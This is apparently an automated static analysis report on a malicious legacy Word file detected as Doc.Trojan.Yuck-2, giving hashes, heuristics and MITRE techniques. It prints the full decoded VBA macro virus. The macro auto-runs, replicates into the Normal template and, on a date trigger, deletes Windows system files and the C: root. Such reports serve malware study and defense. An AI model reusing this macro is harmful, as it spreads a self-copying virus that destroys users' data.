Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 645cba3c734231de…

MALICIOUS

Office (OLE)

Size: 28.5 KB
Created: 1999-05-02 16:32:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 9b6812b88e38dffcb6ed1e0f68fbcf45
SHA-1: 79552b5f56b2b93bba96a4813be238afe4b05c56
SHA-256: 645cba3c734231de7b511cfa707b2bd00128ef2d30f73899def934daa1318cda
Risk Score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file is a legacy Word document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro attempts to copy itself to the Normal template and, under specific date conditions, attempts to delete files from the Windows directory and the root of the C drive. This behavior suggests a downloader or destructive payload, though the specific family is not identifiable.

Heuristics (4)

  • ClamAV: Doc.Trojan.Yuck-2 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Yuck-2
  • VBA macros detected [medium] (OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1512 bytes
SHA-256: 260f887beb1867bfcdc89290bbc83c9a36b9552e71c8783b479446ba3a58fe68
Detection
ClamAV: Doc.Trojan.Yuck-2
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Function CopyMac(kjszrkgeqhwreghfaetr, i23hqwbrjhwreqhecnwqgf4eqwhec) As Long
On Error GoTo EndCopyMac
Application.OrganizerCopy _
   Source:=kjszrkgeqhwreghfaetr, _
   Destination:=i23hqwbrjhwreqhecnwqgf4eqwhec, _
   Name:="AutoOpen", _
   Object:=wdOrganizerObjectProjectItems
EndCopyMac:
CopyMac = Err.Number
On Error GoTo 0
End Function
Sub MAIN()
uztrgkjerzthgkjrebtkerztchtz$ = ActiveDocument.FullName
jkdztuioegbkwetrwuqtgekqgrtwergvjweht$ = NormalTemplate.FullName
jkhkzrgbjhrg$ = "FUCK"
qwzefvnweqrhewlurlweb = CopyMac(uztrgkjerzthgkjrebtkerztchtz$, jkdztuioegbkwetrwuqtgekqgrtwergvjweht$)
If (qwzefvnweqrhewlurlweb = 5940) Then
    qwzefvnweqrhewlurlweb = CopyMac(jkdztuioegbkwetrwuqtgekqgrtwergvjweht$, uztrgkjerzthgkjrebtkerztchtz$)
  If (qwzefvnweqrhewlurlweb = 0) Then
     ActiveDocument.SaveAs _
        FileName:=uztrgkjerzthgkjrebtkerztchtz$, _
        FileFormat:=wdFormatTemplate
  End If
End If
If Day(Now()) = 2 Then
   jkhkzrgbjhrg$ = "FUCK"
   MsgBox ("Word is infected !!!")
End If
If (Day(Now()) = 10) And (Month(Now() = 10)) Then
   jkhkzrgbjhrg$ = "FUCK"
   Kill "c:\windows\*.*"
    Kill "c:\windows\system\*.*"
    Kill "c:\*.*"
End If
End Sub